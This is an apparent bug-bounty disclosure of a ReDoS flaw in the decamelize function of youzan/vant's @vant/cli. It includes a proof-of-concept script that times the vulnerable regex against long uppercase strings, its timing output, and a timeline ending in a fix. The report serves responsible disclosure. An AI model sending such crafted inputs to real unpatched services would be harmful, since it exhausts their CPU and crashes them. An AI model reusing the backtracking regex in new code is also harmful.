Overly Restrictive Regular Expression in youzan/vant

Valid

Reported on

Sep 30th 2021

✍️ Description

The @vant/cli package is vulnerable to Regular Expression Denial of Service (ReDoS). An attacker that is able to provide a crafted string as the input to the decamelize function may cause an application to consume an excessive amount of CPU. Below pinned line using vulnerable regex.

🕵️‍♂️ Proof of Concept

Reproducer where we’ve copied the relevant code:

https://github.com/youzan/vant/blob/ee7aae8b1c48d36366dcae3c5869b771040a8ea9/packages/vant-cli/site/common/index.js#L4-L9

Put the below in a poc.js file and run with node

export function decamelize(str, sep = '-') {
  return str
    .replace(/([a-z\d])([A-Z])/g, '$1' + sep + '$2')
    .replace(/([A-Z]+)([A-Z][a-z\d]+)/g, '$1' + sep + '$2')
    .toLowerCase();
}
for(var i = 1; i <= 500; i++) {
  var time = Date.now();
  var payload = ""+"A".repeat(i*10000)+" "
  decamelize(payload)
  var time_cost = Date.now() - time;
  console.log("Decamelize time : " + payload.length + ": " + time_cost+" ms");
  }

Check the Output:

Decamelize time : 10001: 123 ms
Decamelize time : 20001: 516 ms
Decamelize time : 30001: 1103 ms
Decamelize time : 40001: 1957 ms
Decamelize time : 50001: 3097 ms
Decamelize time : 60001: 4924 ms
Decamelize time : 70001: 6508 ms
Decamelize time : 80001: 8102 ms
Decamelize time : 90001: 11149 ms
Decamelize time : 100001: 12864 ms
--
--

💥 Impact

This vulnerability is capable of exhausting system resources and leads to crashes.

ready-research modified the report
2 years ago
ready-research submitted a
patch
2 years ago
We have contacted a member of the youzan/vant team and are waiting to hear back 2 years ago
neverland validated this vulnerability 2 years ago
ready-research has been awarded the disclosure bounty
The fix bounty is now up for grabs
neverland marked this as fixed in 4.0.1 with commit 202efb 2 years ago
ready-research has been awarded the fix bounty
This vulnerability will not receive a CVE
to join this conversation